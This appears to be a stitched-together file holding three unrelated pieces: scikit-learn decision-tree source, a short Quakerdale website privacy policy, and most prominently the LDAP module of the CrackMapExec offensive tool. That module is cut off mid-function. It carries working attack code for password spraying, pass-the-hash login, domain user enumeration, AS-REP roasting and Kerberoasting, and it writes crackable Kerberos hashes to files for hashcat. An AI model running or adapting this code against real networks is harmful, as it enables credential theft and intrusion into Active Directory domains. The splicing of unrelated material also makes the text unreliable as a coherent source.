.. [3] T. Hastie, R. Tibshirani and J. Friedman. "Elements of Statistical
Learning", Springer, 2009.
.. [4] L. Breiman, and A. Cutler, "Random Forests",
http://www.stat.berkeley.edu/~breiman/RandomForests/cc_home.htm
Examples
--------
>>> from sklearn.datasets import load_iris
>>> from sklearn.model_selection import cross_val_score
>>> from sklearn.tree import DecisionTreeClassifier
>>> clf = DecisionTreeClassifier(random_state=0)
>>> iris = load_iris()
>>> cross_val_score(clf, iris.data, iris.target, cv=10)
... # doctest: +SKIP
...
array([ 1. , 0.93..., 0.86..., 0.93..., 0.93...,
0.93..., 0.93..., 1. , 0.93..., 1. ])
"""
def __init__(self,
criterion="gini",
splitter="best",
max_depth=None,
min_samples_split=2,
min_samples_leaf=1,
min_weight_fraction_leaf=0.,
max_features=None,
random_state=None,
max_leaf_nodes=None,
min_impurity_split=1e-7,
class_weight=None,
presort=False,
increasing=None,
decreasing=None):
super(DecisionTreeClassifier, self).__init__(
criterion=criterion,
splitter=splitter,
max_depth=max_depth,
min_samples_split=min_samples_split,
min_samples_leaf=min_samples_leaf,
min_weight_fraction_leaf=min_weight_fraction_leaf,
max_features=max_features,
max_leaf_nodes=max_leaf_nodes,
class_weight=class_weight,
random_state=random_state,
min_impurity_split=min_impurity_split,
presort=presort,
increasing=increasing,
decreasing=decreasing)
def predict_proba(self, X, check_input=True):
"""Predict class probabilities of the input samples X.
The predicted class probability is the fraction of samples of the same
class in a leaf.
check_input : boolean, (default=True)
Allow to bypass several input checking.
Don't use this parameter unless you know what you do.
Parameters
----------
X : array-like or sparse matrix of shape = [n_samples, n_features]
The input samples. Internally, it will be converted to
``dtype=np.float32`` and if a sparse matrix is provided
to a sparse ``csr_matrix``.
Returns
-------
p : array of shape = [n_samples, n_classes], or a list of n_outputs
such arrays if n_outputs > 1.
The class probabilities of the input samples. The order of the
classes corresponds to that in the attribute `classes_`.
"""
X = self._validate_X_predict(X, check_input)
proba = self.tree_.predict(X)
if self.n_outputs_ == 1:
proba = proba[:, :self.n_classes_]
normalizer = proba.sum(axis=1)[:, np.newaxis]
normalizer[normalizer == 0.0] = 1.0
proba /= normalizer
return proba
else:
all_proba = []
for k in range(self.n_outputs_):
proba_k = proba[:, k, :self.n_classes_[k]]
normalizer = proba_k.sum(axis=1)[:, np.newaxis]
normalizer[normalizer == 0.0] = 1.0
proba_k /= normalizer
all_proba.append(proba_k)
return all_proba
def predict_log_proba(self, X):
"""Predict class log-probabilities of the input samples X.
Parameters
----------
X : array-like or sparse matrix of shape = [n_samples, n_features]
The input samples. Internally, it will be converted to
``dtype=np.float32`` and if a sparse matrix is provided
to a sparse ``csr_matrix``.
Returns
-------
p : array of shape = [n_samples, n_classes], or a list of n_outputs
such arrays if n_outputs > 1.
The class log-probabilities of the input samples. The order of the
classes corresponds to that in the attribute `classes_`.
"""
proba = self.predict_proba(X)
if self.n_outputs_ == 1:
return np.log(proba)
else:
for k in range(self.n_outputs_):
proba[k] = np.log(proba[k])
return proba
class DecisionTreeRegressor(BaseDecisionTree, RegressorMixin):
"""A decision tree regressor.
Read more in the :ref:`User Guide <tree>`.
Parameters
----------
criterion : string, optional (default="mse")
The function to measure the quality of a split. Supported criteria
are "mse" for the mean squared error, which is equal to variance
reduction as feature selection criterion, and "mae" for the mean
absolute error.
.. versionadded:: 0.18
Mean Absolute Error (MAE) criterion.
splitter : string, optional (default="best")
The strategy used to choose the split at each node. Supported
strategies are "best" to choose the best split and "random" to choose
the best random split.
max_features : int, float, string or None, optional (default=None)
The number of features to consider when looking for the best split:
- If int, then consider `max_features` features at each split.
- If float, then `max_features` is a percentage and
`int(max_features * n_features)` features are considered at each
split.
- If "auto", then `max_features=n_features`.
- If "sqrt", then `max_features=sqrt(n_features)`.
- If "log2", then `max_features=log2(n_features)`.
- If None, then `max_features=n_features`.
Note: the search for a split does not stop until at least one
valid partition of the node samples is found, even if it requires to
effectively inspect more than ``max_features`` features.
max_depth : int or None, optional (default=None)
The maximum depth of the tree. If None, then nodes are expanded until
all leaves are pure or until all leaves contain less than
min_samples_split samples.
min_samples_split : int, float, optional (default=2)
The minimum number of samples required to split an internal node:
- If int, then consider `min_samples_split` as the minimum number.
- If float, then `min_samples_split` is a percentage and
`ceil(min_samples_split * n_samples)` are the minimum
number of samples for each split.
min_samples_leaf : int, float, optional (default=1)
The minimum number of samples required to be at a leaf node:
- If int, then consider `min_samples_leaf` as the minimum number.
- If float, then `min_samples_leaf` is a percentage and
`ceil(min_samples_leaf * n_samples)` are the minimum
number of samples for each node.
min_weight_fraction_leaf : float, optional (default=0.)
The minimum weighted fraction of the input samples required to be at a
leaf node.
max_leaf_nodes : int or None, optional (default=None)
Grow a tree with ``max_leaf_nodes`` in best-first fashion.
Best nodes are defined as relative reduction in impurity.
If None then unlimited number of leaf nodes.
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
min_impurity_split : float, optional (default=1e-7)
Threshold for early stopping in tree growth. If the impurity
of a node is below the threshold, the node is a leaf.
.. versionadded:: 0.18
presort : bool, optional (default=False)
Whether to presort the data to speed up the finding of best splits in
fitting. For the default settings of a decision tree on large
datasets, setting this to true may slow down the training process.
When using either a smaller dataset or a restricted depth, this may
speed up the training.
increasing : list of ints, optional (default=None)
Indices of features to have a monotonically increasing effect.
decreasing : list of ints, optional (default=None)
Indices of features to have a monotonically decreasing effect.
Attributes
----------
feature_importances_ : array of shape = [n_features]
The feature importances.
The higher, the more important the feature.
The importance of a feature is computed as the
(normalized) total reduction of the criterion brought
by that feature. It is also known as the Gini importance [4]_.
max_features_ : int,
The inferred value of max_features.
n_features_ : int
The number of features when ``fit`` is performed.
n_outputs_ : int
The number of outputs when ``fit`` is performed.
tree_ : Tree object
The underlying Tree object.
See also
--------
DecisionTreeClassifier
References
----------
.. [1] https://en.wikipedia.org/wiki/Decision_tree_learning
.. [2] L. Breiman, J. Friedman, R. Olshen, and C. Stone, "Classification
and Regression Trees", Wadsworth, Belmont, CA, 1984.
.. [3] T. Hastie, R. Tibshirani and J. Friedman. "Elements of Statistical
Learning", Springer, 2009.
.. [4] L. Breiman, and A. Cutler, "Random Forests",
http://www.stat.berkeley.edu/~breiman/RandomForests/cc_home.htm
Examples
--------
>>> from sklearn.datasets import load_boston
>>> from sklearn.model_selection import cross_val_score
>>> from sklearn.tree import DecisionTreeRegressor
>>> boston = load_boston()
>>> regressor = DecisionTreeRegressor(random_state=0)
>>> cross_val_score(regressor, boston.data, boston.target, cv=10)
... # doctest: +SKIP
...
array([ 0.61..., 0.57..., -0.34..., 0.41..., 0.75...,
0.07..., 0.29..., 0.33..., -1.42..., -1.77...])
"""
def __init__(self,
criterion="mse",
splitter="best",
max_depth=None,
min_samples_split=2,
min_samples_leaf=1,
min_weight_fraction_leaf=0.,
max_features=None,
random_state=None,
max_leaf_nodes=None,
min_impurity_split=1e-7,
presort=False,
increasing=None,
decreasing=None):
super(DecisionTreeRegressor, self).__init__(
criterion=criterion,
splitter=splitter,
max_depth=max_depth,
min_samples_split=min_samples_split,
min_samples_leaf=min_samples_leaf,
min_weight_fraction_leaf=min_weight_fraction_leaf,
max_features=max_features,
max_leaf_nodes=max_leaf_nodes,
random_state=random_state,
min_impurity_split=min_impurity_split,
presort=presort,
increasing=increasing,
decreasing=decreasing)
class ExtraTreeClassifier(DecisionTreeClassifier):
"""An extremely randomized tree classifier.
Extra-trees differ from classic decision trees in the way they are built.
When looking for the best split to separate the samples of a node into two
groups, random splits are drawn for each of the `max_features` randomly
selected features and the best split among those is chosen. When
`max_features` is set 1, this amounts to building a totally random
decision tree.
Warning: Extra-trees should only be used within ensemble methods.
Read more in the :ref:`User Guide <tree>`.
See also
--------
ExtraTreeRegressor, ExtraTreesClassifier, ExtraTreesRegressor
References
----------
.. [1] P. Geurts, D. Ernst., and L. Wehenkel, "Extremely randomized trees",
Machine Learning, 63(1), 3-42, 2006.
"""
def __init__(self,
criterion="gini",
splitter="random",
max_depth=None,
min_samples_split=2,
min_samples_leaf=1,
min_weight_fraction_leaf=0.,
max_features="auto",
random_state=None,
max_leaf_nodes=None,
min_impurity_split=1e-7,
class_weight=None,
increasing=None,
decreasing=None):
super(ExtraTreeClassifier, self).__init__(
criterion=criterion,
splitter=splitter,
max_depth=max_depth,
min_samples_split=min_samples_split,
min_samples_leaf=min_samples_leaf,
min_weight_fraction_leaf=min_weight_fraction_leaf,
max_features=max_features,
max_leaf_nodes=max_leaf_nodes,
class_weight=class_weight,
min_impurity_split=min_impurity_split,
random_state=random_state,
increasing=increasing,
decreasing=decreasing)
class ExtraTreeRegressor(DecisionTreeRegressor):
"""An extremely randomized tree regressor.
Extra-trees differ from classic decision trees in the way they are built.
When looking for the best split to separate the samples of a node into two
groups, random splits are drawn for each of the `max_features` randomly
selected features and the best split among those is chosen. When
`max_features` is set 1, this amounts to building a totally random
decision tree.
Warning: Extra-trees should only be used within ensemble methods.
Read more in the :ref:`User Guide <tree>`.
See also
--------
ExtraTreeClassifier, ExtraTreesClassifier, ExtraTreesRegressor
References
----------
.. [1] P. Geurts, D. Ernst., and L. Wehenkel, "Extremely randomized trees",
Machine Learning, 63(1), 3-42, 2006.
"""
def __init__(self,
criterion="mse",
splitter="random",
max_depth=None,
min_samples_split=2,
min_samples_leaf=1,
min_weight_fraction_leaf=0.,
max_features="auto",
random_state=None,
min_impurity_split=1e-7,
max_leaf_nodes=None,
increasing=None,
decreasing=None):
super(ExtraTreeRegressor, self).__init__(
criterion=criterion,
splitter=splitter,
max_depth=max_depth,
min_samples_split=min_samples_split,
min_samples_leaf=min_samples_leaf,
min_weight_fraction_leaf=min_weight_fraction_leaf,
max_features=max_features,
max_leaf_nodes=max_leaf_nodes,
min_impurity_split=min_impurity_split,
random_state=random_state,
increasing=increasing,
decreasing=decreasing)
|
This web site is owned and operated by White’s Iowa Institute dba Quakerdale (hereafter referred to as Quakerdale). We respect the privacy of every individual who visits our site. We do not collect personally identifiable information from individuals unless they provide it to us voluntarily and knowingly. If you register to use various features of our site, we use the information you supply for the purpose of providing the services you have requested. We may also contact you from time to time with information that relates to your requests or interests.
Quakerdale collects two types of information: personal voluntary registration information, such as name and e-mail address, and non-personal statistical information, such as site traffic and usage patterns. This information is used primarily to deliver requested information and to improve the design and structure of the site. It is used solely by Quakerdale and others involved in the operation of this web site and will never be sold or given to third parties.
To protect your privacy, we use encryption technologies. In addition, we allow only authorized employees or agents to have access to personal information. Although we cannot guarantee there will be no unauthorized access to personal information, these measures increase the security and privacy of information traveling to, from and within our web site.
|
# from https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetNPUsers.py
# https://troopers.de/downloads/troopers19/TROOPERS19_AD_Fun_With_LDAP.pdf
import requests
import logging
import configparser
from cme.connection import *
from cme.helpers.logger import highlight
from cme.logger import CMEAdapter
from cme.protocols.ldap.kerberos import KerberosAttacks
from impacket.smbconnection import SMBConnection, SessionError
from impacket.smb import SMB_DIALECT
from impacket.dcerpc.v5.samr import UF_ACCOUNTDISABLE, UF_DONT_REQUIRE_PREAUTH, UF_TRUSTED_FOR_DELEGATION, UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION
from impacket.krb5.kerberosv5 import sendReceive, KerberosError, getKerberosTGT, getKerberosTGS
from impacket.krb5.types import KerberosTime, Principal
from impacket.ldap import ldap as ldap_impacket
from impacket.krb5 import constants
from impacket.ldap import ldapasn1 as ldapasn1_impacket
from io import StringIO
class ldap(connection):
def __init__(self, args, db, host):
self.domain = None
self.server_os = None
self.os_arch = 0
self.hash = None
self.ldapConnection = None
self.lmhash = ''
self.nthash = ''
self.baseDN = ''
self.remote_ops = None
self.bootkey = None
self.output_filename = None
self.smbv1 = None
self.signing = False
self.smb_share_name = smb_share_name
self.admin_privs = False
connection.__init__(self, args, db, host)
@staticmethod
def proto_args(parser, std_parser, module_parser):
ldap_parser = parser.add_parser('ldap', help="own stuff using ldap", parents=[std_parser, module_parser])
ldap_parser.add_argument("-H", '--hash', metavar="HASH", dest='hash', nargs='+', default=[], help='NTLM hash(es) or file(s) containing NTLM hashes')
ldap_parser.add_argument("--no-bruteforce", action='store_true', help='No spray when using file for username and password (user1 => password1, user2 => password2')
ldap_parser.add_argument("--continue-on-success", action='store_true', help="continues authentication attempts even after successes")
ldap_parser.add_argument("--port", type=int, choices={389, 636}, default=389, help="LDAP port (default: 389)")
dgroup = ldap_parser.add_mutually_exclusive_group()
dgroup.add_argument("-d", metavar="DOMAIN", dest='domain', type=str, default=None, help="domain to authenticate to")
dgroup.add_argument("--local-auth", action='store_true', help='authenticate locally to each target')
egroup = ldap_parser.add_argument_group("Retrevie hash on the remote DC", "Options to get hashes from Kerberos")
egroup.add_argument("--asreproast", help="Get AS_REP response ready to crack with hashcat")
egroup.add_argument("--kerberoasting", help='Get TGS ticket ready to crack with hashcat')
vgroup = ldap_parser.add_argument_group("Retrieve useful information on the domain", "Options to to play with Kerberos")
vgroup.add_argument("--trusted-for-delegation", action="store_true", help="Get the list of users and computers with flag TRUSTED_FOR_DELEGATION")
vgroup.add_argument("--password-not-required", action="store_true", help="Get the list of users with flag PASSWD_NOTREQD")
vgroup.add_argument("--admin-count", action="store_true", help="Get objets that had the value adminCount=1")
vgroup.add_argument("--users", action="store_true", help="Enumerate domain users")
vgroup.add_argument("--groups", action="store_true", help="Enumerate domain groups")
return parser
def proto_logger(self):
self.logger = CMEAdapter(extra={
'protocol': 'LDAP',
'host': self.host,
'port': self.args.port,
'hostname': self.hostname
})
def get_os_arch(self):
try:
stringBinding = r'ncacn_ip_tcp:{}[135]'.format(self.host)
transport = DCERPCTransportFactory(stringBinding)
transport.set_connect_timeout(5)
dce = transport.get_dce_rpc()
if self.args.kerberos:
dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)
dce.connect()
try:
dce.bind(MSRPC_UUID_PORTMAP, transfer_syntax=('71710533-BEBA-4937-8319-B5DBEF9CCC36', '1.0'))
except (DCERPCException, e):
if str(e).find('syntaxes_not_supported') >= 0:
dce.disconnect()
return 32
else:
dce.disconnect()
return 64
except Exception as e:
logging.debug('Error retrieving os arch of {}: {}'.format(self.host, str(e)))
return 0
def enum_host_info(self):
self.local_ip = self.conn.getSMBServer().get_socket().getsockname()[0]
try:
self.conn.login('' , '')
except:
#if "STATUS_ACCESS_DENIED" in e:
pass
self.domain = self.conn.getServerDNSDomainName()
self.hostname = self.conn.getServerName()
self.server_os = self.conn.getServerOS()
self.signing = self.conn.isSigningRequired() if self.smbv1 else self.conn._SMBConnection._Connection['RequireSigning']
self.os_arch = self.get_os_arch()
self.output_filename = os.path.expanduser('~/.cme/logs/{}_{}_{}'.format(self.hostname, self.host, datetime.now().strftime("%Y-%m-%d_%H%M%S")))
if not self.domain:
self.domain = self.hostname
try:
'''plaintext_login
DC's seem to want us to logoff first, windows workstations sometimes reset the connection
(go home Windows, you're drunk)
'''
self.conn.logoff()
except:
pass
if self.args.domain:
self.domain = self.args.domain
if self.args.local_auth:
self.domain = self.hostname
#Re-connect since we logged off
self.create_conn_obj()
def print_host_info(self):
self.logger.info(u"{}{} (name:{}) (domain:{}) (signing:{}) (SMBv1:{})".format(self.server_os,
' x{}'.format(self.os_arch) if self.os_arch else '',
self.hostname,
self.domain,
self.signing,
self.smbv1))
def kerberos_login(self, aesKey, kdcHost):
# Create the baseDN
domainParts = self.domain.split('.')
self.baseDN = ''
for i in domainParts:
self.baseDN += 'dc=%s,' % i
# Remove last ','
self.baseDN = self.baseDN[:-1]
if self.kdcHost is not None:
target = self.kdcHost
else:
target = self.domain
try:
self.ldapConnection.kerberosLogin(self.username, self.password, self.domain, self.lmhash, self.nthash,
self.aesKey, kdcHost=self.kdcHost)
except ldap_impacket.LDAPSessionError as e:
if str(e).find('strongerAuthRequired') >= 0:
# We need to try SSL
self.ldapConnection = ldap_impacket.LDAPConnection('ldaps://%s' % target, self.baseDN, self.kdcHost)
self.ldapConnection.kerberosLogin(self.username, self.password, self.domain, self.lmhash, self.nthash,
self.aesKey, kdcHost=self.kdcHost)
return True
def plaintext_login(self, domain, username, password):
self.username = username
self.password = password
self.domain = domain
# Create the baseDN
self.baseDN = ''
domainParts = self.domain.split('.')
for i in domainParts:
self.baseDN += 'dc=%s,' % i
# Remove last ','
self.baseDN = self.baseDN[:-1]
if self.kdcHost is not None:
target = self.kdcHost
else:
target = domain
if self.password == '' and self.args.asreproast:
hash_TGT = KerberosAttacks(self).getTGT_asroast(self.username)
if hash_TGT:
self.logger.highlight(u'{}'.format(hash_TGT))
with open(self.args.asreproast, 'a+') as hash_asreproast:
hash_asreproast.write(hash_TGT + '\n')
return False
try:
self.ldapConnection = ldap_impacket.LDAPConnection('ldap://%s' % target, self.baseDN, self.kdcHost)
self.ldapConnection.login(self.username, self.password, self.domain, self.lmhash, self.nthash)
#self.check_if_admin()
# Connect to LDAP
out = u'{}{}:{} {}'.format('{}\\'.format(domain),
username,
password,
highlight('({})'.format(self.config.get('CME', 'pwn3d_label')) if self.admin_privs else ''))
self.logger.success(out)
if not self.args.continue_on_success:
return True
except ldap_impacket.LDAPSessionError as e:
if str(e).find('strongerAuthRequired') >= 0:
# We need to try SSL
try:
self.ldapConnection = ldap_impacket.LDAPConnection('ldaps://%s' % target, self.baseDN, self.kdcHost)
self.ldapConnection.login(self.username, self.password, self.domain, self.lmhash, self.nthash)
self.logger.success(out)
except ldap_impacket.LDAPSessionError as e:
self.logger.error(u'{}\{}:{}'.format(self.domain,
self.username,
self.password))
else:
self.logger.error(u'{}\{}:{}'.format(self.domain,
self.username,
self.password))
return False
except OSError as e:
self.logger.error(u'{}\{}:{} {}'.format(self.domain,
self.username,
self.password,
"Error connecting to the domain, please add option --kdcHost with the IP of the domain controller"))
return False
def hash_login(self, domain, username, ntlm_hash):
lmhash = ''
nthash = ''
#This checks to see if we didn't provide the LM Hash
if ntlm_hash.find(':') != -1:
lmhash, nthash = ntlm_hash.split(':')
else:
nthash = ntlm_hash
self.hash = ntlm_hash
if lmhash: self.lmhash = lmhash
if nthash: self.nthash = nthash
self.username = username
self.domain = domain
# Create the baseDN
self.baseDN = ''
domainParts = self.domain.split('.')
for i in domainParts:
self.baseDN += 'dc=%s,' % i
# Remove last ','
self.baseDN = self.baseDN[:-1]
if self.kdcHost is not None:
target = self.kdcHost
else:
target = domain
if self.hash == '' and self.args.asreproast:
hash_TGT = KerberosAttacks(self).getTGT_asroast(self.username)
if hash_TGT:
self.logger.highlight(u'{}'.format(hash_TGT))
with open(self.args.asreproast, 'a+') as hash_asreproast:
hash_asreproast.write(hash_TGT + '\n')
return False
# Connect to LDAP
out = u'{}{}:{}'.format('{}\\'.format(domain),
username,
nthash)
try:
self.ldapConnection = ldap_impacket.LDAPConnection('ldap://%s' % target, self.baseDN, self.kdcHost)
self.ldapConnection.login(self.username, self.password, self.domain, self.lmhash, self.nthash)
#self.check_if_admin()
self.logger.success(out)
if not self.args.continue_on_success:
return True
except ldap_impacket.LDAPSessionError as e:
if str(e).find('strongerAuthRequired') >= 0:
try:
# We need to try SSL
self.ldapConnection = ldap_impacket.LDAPConnection('ldaps://%s' % target, self.baseDN, self.kdcHost)
self.ldapConnection.login(self.username, self.password, self.domain, self.lmhash, self.nthash)
self.logger.success(out)
except ldap_impacket.LDAPSessionError as e:
self.logger.error(u'{}\{}:{}'.format(self.domain,
self.username,
self.nthash))
else:
self.logger.error(u'{}\{}:{}'.format(self.domain,
self.username,
self.nthash))
return False
except OSError as e:
self.logger.error(u'{}\{}:{} {}'.format(self.domain,
self.username,
self.nthash,
"Error connecting to the domain, please add option --kdcHost with the IP of the domain controller"))
return False
def create_smbv1_conn(self):
try:
self.conn = SMBConnection(self.host, self.host, None, 445, preferredDialect=SMB_DIALECT)
self.smbv1 = True
except socket.error as e:
if str(e).find('Connection reset by peer') != -1:
logging.debug('SMBv1 might be disabled on {}'.format(self.host))
return False
except Exception as e:
logging.debug('Error creating SMBv1 connection to {}: {}'.format(self.host, e))
return False
return True
def create_smbv3_conn(self):
try:
self.conn = SMBConnection(self.host, self.host, None, 445)
self.smbv1 = False
except socket.error:
return False
except Exception as e:
logging.debug('Error creating SMBv3 connection to {}: {}'.format(self.host, e))
return False
return True
def create_conn_obj(self):
if self.create_smbv1_conn():
return True
elif self.create_smbv3_conn():
return True
return False
def getUnixTime(self, t):
t -= 116444736000000000
t /= 10000000
return t
def search(self, searchFilter, attributes, sizeLimit=999):
try:
logging.debug('Search Filter=%s' % searchFilter)
resp = self.ldapConnection.search(searchFilter=searchFilter,
attributes=attributes,
sizeLimit=sizeLimit)
except ldap_impacket.LDAPSearchError as e:
if e.getErrorString().find('sizeLimitExceeded') >= 0:
logging.debug('sizeLimitExceeded exception caught, giving up and processing the data received')
# We reached the sizeLimit, process the answers we have already and that's it. Until we implement
# paged queries
resp = e.getAnswers()
pass
else:
logging.debug(e)
return False
return resp
def users(self):
# Building the search filter
searchFilter = "(sAMAccountType=805306368)"
attributes= []
resp = self.search(searchFilter, attributes, 999)
answers = []
logging.debug('Total of records returned %d' % len(resp))
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
mustCommit = False
sAMAccountName = ''
badPasswordTime = ''
badPwdCount = 0
try:
for attribute in item['attributes']:
if str(attribute['type']) == 'sAMAccountName':
sAMAccountName = str(attribute['vals'][0])
mustCommit = True
elif str(attribute['type']) == 'badPwdCount':
badPwdCount = "0x%x" % int(attribute['vals'][0])
elif str(attribute['type']) == 'badPasswordTime':
if str(attribute['vals'][0]) == '0':
badPasswordTime = '<never>'
else:
badPasswordTime = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
if mustCommit is True:
answers.append([sAMAccountName, badPwdCount, badPasswordTime])
except Exception as e:
logging.debug("Exception:", exc_info=True)
logging.debug('Skipping item, cannot process due to error %s' % str(e))
pass
if len(answers)>0:
logging.debug(answers)
for value in answers:
self.logger.highlight('{:<30} badpwdcount: {} pwdLastSet: {}'.format(value[0], int(value[1],16),value[2]))
else:
self.logger.error("No entries found!")
return
def groups(self):
# Building the search filter
searchFilter = "(objectCategory=group)"
attributes=[]
resp = self.search(searchFilter, attributes, 999)
answers = []
logging.debug('Total of records returned %d' % len(resp))
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
mustCommit = False
name = ''
try:
for attribute in item['attributes']:
if str(attribute['type']) == 'name':
name = str(attribute['vals'][0])
mustCommit = True
# if str(attribute['type']) == 'objectSid':
# print(format_sid((attribute['vals'][0])))
if mustCommit is True:
answers.append([name])
except Exception as e:
logging.debug("Exception:", exc_info=True)
logging.debug('Skipping item, cannot process due to error %s' % str(e))
pass
if len(answers)>0:
logging.debug(answers)
for value in answers:
self.logger.highlight('{}'.format(value[0]))
else:
self.logger.error("No entries found!")
return
def asreproast(self):
if self.password == '' and self.nthash == '' and self.kerberos == False:
return False
# Building the search filter
searchFilter = "(&(UserAccountControl:1.2.840.113556.1.4.803:=%d)" \
"(!(UserAccountControl:1.2.840.113556.1.4.803:=%d))(!(objectCategory=computer)))" % \
(UF_DONT_REQUIRE_PREAUTH, UF_ACCOUNTDISABLE)
attributes = ['sAMAccountName', 'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon']
resp = self.search(searchFilter, attributes, 999)
answers = []
logging.debug('Total of records returned %d' % len(resp))
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
mustCommit = False
sAMAccountName = ''
memberOf = ''
pwdLastSet = ''
userAccountControl = 0
lastLogon = 'N/A'
try:
for attribute in item['attributes']:
if str(attribute['type']) == 'sAMAccountName':
sAMAccountName = str(attribute['vals'][0])
mustCommit = True
elif str(attribute['type']) == 'userAccountControl':
userAccountControl = "0x%x" % int(attribute['vals'][0])
elif str(attribute['type']) == 'memberOf':
memberOf = str(attribute['vals'][0])
elif str(attribute['type']) == 'pwdLastSet':
if str(attribute['vals'][0]) == '0':
pwdLastSet = '<never>'
else:
pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
elif str(attribute['type']) == 'lastLogon':
if str(attribute['vals'][0]) == '0':
lastLogon = '<never>'
else:
lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
if mustCommit is True:
answers.append([sAMAccountName,memberOf, pwdLastSet, lastLogon, userAccountControl])
except Exception as e:
logging.debug("Exception:", exc_info=True)
logging.debug('Skipping item, cannot process due to error %s' % str(e))
pass
if len(answers)>0:
for user in answers:
hash_TGT = KerberosAttacks(self).getTGT_asroast(user[0])
self.logger.highlight(u'{}'.format(hash_TGT))
with open(self.args.asreproast, 'a+') as hash_asreproast:
hash_asreproast.write(hash_TGT + '\n')
return True
else:
self.logger.error("No entries found!")
def kerberoasting(self):
# Building the search filter
searchFilter = "(&(servicePrincipalName=*)(UserAccountControl:1.2.840.113556.1.4.803:=512)" \
"(!(UserAccountControl:1.2.840.113556.1.4.803:=2))(!(objectCategory=computer)))"
attributes = ['servicePrincipalName', 'sAMAccountName', 'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon']
resp = self.search(searchFilter, attributes, 999)
answers = []
logging.debug('Total of records returned %d' % len(resp))
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
mustCommit = False
sAMAccountName = ''
memberOf = ''
SPNs = []
pwdLastSet = ''
userAccountControl = 0
lastLogon = 'N/A'
delegation = ''
try:
for attribute in item['attributes']:
if str(attribute['type']) == 'sAMAccountName':
sAMAccountName = str(attribute['vals'][0])
mustCommit = True
elif str(attribute['type']) == 'userAccountControl':
userAccountControl = str(attribute['vals'][0])
if int(userAccountControl) & UF_TRUSTED_FOR_DELEGATION:
delegation = 'unconstrained'
elif int(userAccountControl) & UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION:
delegation = 'constrained'
elif str(attribute['type']) == 'memberOf':
memberOf = str(attribute['vals'][0])
elif str(attribute['type']) == 'pwdLastSet':
if str(attribute['vals'][0]) == '0':
pwdLastSet = '<never>'
else:
pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
elif str(attribute['type']) == 'lastLogon':
if str(attribute['vals'][0]) == '0':
lastLogon = '<never>'
else:
lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
elif str(attribute['type']) == 'servicePrincipalName':
for spn in attribute['vals']:
SPNs.append(str(spn))
if mustCommit is True:
if int(userAccountControl) & UF_ACCOUNTDISABLE:
logging.debug('Bypassing disabled account %s ' % sAMAccountName)
else:
for spn in SPNs:
answers.append([spn, sAMAccountName,memberOf, pwdLastSet, lastLogon, delegation])
except Exception as e:
logging.error('Skipping item, cannot process due to error %s' % str(e))
pass
if len(answers)>0:
#users = dict( (vals[1], vals[0]) for vals in answers)
TGT = KerberosAttacks(self).getTGT_kerberoasting()
for SPN, sAMAccountName, memberOf, pwdLastSet, lastLogon, delegation in answers:
try:
serverName = Principal(SPN, type=constants.PrincipalNameType.NT_SRV_INST.value)
tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(serverName, self.domain,
self.kdcHost,
TGT['KDC_REP'], TGT['cipher'],
TGT['sessionKey'])
r = KerberosAttacks(self).outputTGS(tgs, oldSessionKey, sessionKey, sAMAccountName, SPN)
self.logger.highlight(u'sAMAccountName: {} memberOf: {} pwdLastSet: {} lastLogon:{}'.format(sAMAccountName, memberOf, pwdLastSet, lastLogon))
self.logger.highlight(u'{}'.format(r))
with open(self.args.kerberoasting, 'a+') as hash_kerberoasting:
hash_kerberoasting.write(r + '\n')
except Exception as e:
logging.debug("Exception:", exc_info=True)
logging.error('SPN: %s - %s' % (SPN,str(e)))
else:
self.logger.error("No entries found!")
def trusted_for_delegation(self):
# Building the search filter
searchFilter = "(userAccountControl:1.2.840.113556.1.4.803:=524288)"
attributes = ['sAMAccountName', 'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon']
resp = self.search(searchFilter, attributes, 999)
answers = []
logging.debug('Total of records returned %d' % len(resp))
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
mustCommit = False
sAMAccountName = ''
memberOf = ''
pwdLastSet = ''
userAccountControl = 0
lastLogon = 'N/A'
try:
for attribute in item['attributes']:
if str(attribute['type']) == 'sAMAccountName':
sAMAccountName = str(attribute['vals'][0])
mustCommit = True
elif str(attribute['type']) == 'userAccountControl':
userAccountControl = "0x%x" % int(attribute['vals'][0])
elif str(attribute['type']) == 'memberOf':
memberOf = str(attribute['vals'][0])
elif str(attribute['type']) == 'pwdLastSet':
if str(attribute['vals'][0]) == '0':
pwdLastSet = '<never>'
else:
pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
elif str(attribute['type']) == 'lastLogon':
if str(attribute['vals'][0]) == '0':
lastLogon = '<never>'
else:
lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
if mustCommit is True:
answers.append([sAMAccountName,memberOf, pwdLastSet, lastLogon, userAccountControl])
except Exception as e:
logging.debug("Exception:", exc_info=True)
logging.debug('Skipping item, cannot process due to error %s' % str(e))
pass
if len(answers)>0:
logging.debug(answers)
for value in answers:
self.logger.highlight(value[0])
else:
self.logger.error("No entries found!")
return
def password_not_required(self):
# Building the search filter
searchFilter = "(userAccountControl:1.2.840.113556.1.4.803:=32)"
try:
logging.debug('Search Filter=%s' % searchFilter)
resp = self.ldapConnection.search(searchFilter=searchFilter,
attributes=['sAMAccountName',
'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon'],
sizeLimit=999)
